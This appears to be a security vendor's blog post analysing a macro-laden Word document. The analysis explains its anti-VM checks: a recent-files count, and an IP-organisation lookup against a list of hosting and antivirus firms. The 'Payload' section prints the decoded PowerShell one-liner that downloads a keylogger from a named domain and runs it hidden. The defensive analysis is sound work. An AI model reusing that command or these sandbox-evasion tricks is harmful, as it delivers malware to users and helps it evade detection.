Anti VM Tricks | Malware VM Detection Techniques

The Malware Sample

Recently, I was tasked with investigating a malware sample which sometimes failed to behave maliciously. Unlike normal people, I spend a lot of time trying to run malware and it can be surprisingly difficult to get it to behave like it should. Any number of things can go wrong which can lead to the malware simply crashing or not doing anything at all. In this post, I’ll discuss some clever anti vm tricks observed in a malicious Word document.

The sample’s sha256 hash is 048fc07fb94a74990d2d2b8e92c099f3f986af185c32d74c857b07f7fcce7f8e. Additional related samples can be found by searching VirusTotal for "vbaproject.bin" "activeX1.bin" type:docx.

Here’s how the document looks when opened in Word:

If that didn’t look suspicious enough, here’s a view of the code:

This is textbook Word malware. It has no real content, includes executable code (active content), and the code is obfuscated and sketchy looking.

The Malware Investigation (VM Detection)

I first looked at the code and noticed this subroutine near the top: InkPicture1_Painted(ByVal DQkDFU As Long, ByVal KPhPosT As IInkRectangle). This looked like the execute entry point and was probably executed as soon as the “Enable Content” button was clicked and every time ActiveX control was rendered (i.e. painted) by Word. All it does is call IuIxpP and swallow any and all errors that are raised.

Trick #1

The IuIxpP sub calls two methods, DKTxHE and qrNjY and raises an error if either one returns true. The first, DKTxHE is deviously simple:

Public Function DKTxHE() As Boolean
DKTxHE = RecentFiles.Count < 3
End Function

The RecentFiles object gives access to the history of recent documents. Most users, unless they just installed Word, are going to have opened more than two documents. However, on a testing virtual machine (VM), the software is normally not “broken in”. When the VM is initially created, software is installed, maybe opened once or twice to make sure it works, and then the state is saved and every time a test needs to be made, that state is loaded again. These VM images may then be used in automated analysis and testing tools which execute malware and see how they behave. If malware can be smart enough to know when it’s being tested in a VM, it can avoid doing anything suspicious or malicious and thereby increase the time it takes to be detected by such tools.

Trick #2

The second sub, qrNjY, also tries to detect if it’s in a VM by getting information about the IP address. It makes a request to https://www.maxmind.com/geoip/v2.1/city/me which normally requires some kind of authentication or API key. To get around this requirement, the malware makes the request look as if it’s coming from the site itself by setting the HTTP Referrer to https://www.maxmind.com/en/locate-my-ip-address and User-Agent to Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0). This bypass only allows one to retrieve the information about the requesting address, which has limited uses.

The response is in JSON and contains information such as the country, city, and, most importantly, the organization associated with the IP address. For example:

{
  "location": {
    "latitude": 30.7858,
    "longitude": -102.1232,
    "metro_code": 705,
    "accuracy_radius": 5,
    "time_zone": "America/Los_Angeles"
  },
  "continent": {
    "names": {
      "ja": "北アメリカ",
      "pt-BR": "América do Norte",
      "de": "Nordamerika",
      "es": "Norteamérica",
      "ru": "Северная Америка",
      "fr": "Amérique du Nord",
      "zh-CN": "北美洲",
      "en": "North America"
    },
    "code": "NA",
    "geoname_id": 6255149
  },
  "city": {
    "names": {
      "pt-BR": "Oakland",
      "de": "Oakland",
      "es": "Oakland",
      "ja": "オークランド",
      "en": "Oakland",
      "ru": "Окленд",
      "fr": "Oakland",
      "zh-CN": "奥克兰"
    },
    "geoname_id": 5378538
  },
  "postal": {
    "code": "94619"
  },
  "country": {
    "names": {
      "ru": "США",
      "fr": "États-Unis",
      "zh-CN": "美国",
      "en": "United States",
      "ja": "アメリカ合衆国",
      "es": "Estados Unidos",
      "pt-BR": "Estados Unidos",
      "de": "USA"
    },
    "iso_code": "US",
    "geoname_id": 6252001
  },
  "traits": {
    "organization": "Comcast Cable",
    "isp": "Comcast Cable",
    "ip_address": "123.123.123.123",
    "autonomous_system_organization": "Comcast Cable Communications, LLC",
    "domain": "comcast.net",
    "autonomous_system_number": 7922
  },
  "registered_country": {
    "geoname_id": 6252001,
    "names": {
      "zh-CN": "美国",
      "ru": "США",
      "fr": "États-Unis",
      "en": "United States",
      "ja": "アメリカ合衆国",
      "pt-BR": "Estados Unidos",
      "de": "USA",
      "es": "Estados Unidos"
    },
    "iso_code": "US"
  },
  "subdivisions": [
    {
      "geoname_id": 5332921,
      "names": {
        "ru": "Калифорния",
        "fr": "Californie",
        "zh-CN": "加利福尼亚州",
        "en": "California",
        "ja": "カリフォルニア州",
        "pt-BR": "Califórnia",
        "es": "California",
        "de": "Kalifornien"
      },
      "iso_code": "CA"
    }
  ]
}

In the example response, it’s known the IP address is associated with Comcast. After this request is made, several strings are decrypted and stored in an array. If any of the strings in the array are found to be in the JSON response, the code throws an error and code stops executing. Everything is converted to uppercase before doing any comparisons. The list of strings in the array, with fixed capitalization and sorted alphabetically:

Amazon
anonymous
BitDefender
BlackOakComputers
Blue Coat
BlueCoat
Cisco
cloud
Data Center
DataCenter
DataCentre
dedicated
ESET, Spol
FireEye
ForcePoint
Fortinet
Hetzner
hispeed.ch
hosted
Hosting
Iron Port
IronPort
LeaseWeb
MessageLabs
Microsoft
MimeCast
NForce
Ovh Sas
Palo Alto
ProofPoint
Rackspace
security
Server
Strong Technologies
Trend Micro
TrendMicro
TrustWave
VMVault
Zscaler

After this list was obtained, it was clear the purpose of this sub is to check if the IP address is associated with any hosting or anti-virus companies which are likely to be hosting testing VMs.

After taking apart and understanding the two anti-sandbox / anti vm subroutines, I had a pretty good idea why we sometimes failed to detect this particular sample. To test my hypothesis, I created an empty Word document and copy pasted it twice to produce three documents with different names. Then, I opened each one and closed Word in order to populate the recent documents history. Finally, I opened the malware in question, enabled active content, and was immediately greeted with a satisfying “Threat Detected” popup and the near immediate termination of the malicious document. If I opened the malware without first creating a history of recent documents, the malware would fail to do anything malicious at all. Because it didn’t actually do anything bad, it wasn’t detected.

The Payload

Still somewhat curious about what the payload could be, I continued taking apart the sample to find that it executes some PowerShell:

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -command $f=[System.IO.Path]::GetTempFileName();(New-Object System.Net.WebClient).DownloadFile('http://silkflowersdecordesign.com/admin/worddata.dat', $f);(New-Object -com WScript.Shell).Exec($f)

This script downloads http://silkflowersdecordesign.com/admin/worddata.dat which turned out to be a low level key logger. The sha256 hash for worddata.dat is 19d884d3b688abf8e284d3bc6a06817096d15592bcd73f85a0e4b79749f2a744.

Related Works (Anti VM / Anti Sandbox Techniques)

Very closely related anti-vm / anti-sandbox techniques have been discussed by researchers at Proofpoint and
by Deepen Desai at zscaler. Since these methods are appearing in different malware families, they seem to represent a new trend for VBA-based malware.

Conclusion

Testing malware is hard and there’s a lot that can go wrong, especially if you don’t rely merely on simple signatures but instead detect malicious behavior. For a fair evaluation of an AV product, any test must be done in such a way as to exercise the most malicious code and invoke realistic behaviors from the malware samples. This means selecting malware which is still “alive”, i.e. has command and control servers which are still up and functioning as well as configuring the test VM to seem like an actual user’s machine as much as possible. Both of these conditions are possible, but it’s easy to stuff a test set with malware samples which are either not valid executables or don’t behave maliciously and many tests are performed on freshly minted VM images with no user activity history, and running in the cloud which can be detected by interrogating IP address information. Selecting good samples and creating good VM images is possible, but it takes extra effort.

Not only does this sort of lazy evaluation skew detection results, but the skew is unrealistic. Signatures can easily detect executables that don’t run and can’t behave maliciously, but is that really what’s threatening your users? Real threats are the ones no one has seen yet or are very new and signatures haven’t been created. A fair test must necessarily include current and functional samples executed in a realistic environment.

For more information on how to protect against unknown attacks, check out our Next Generation Endpoint Protection Buyer’s Guide.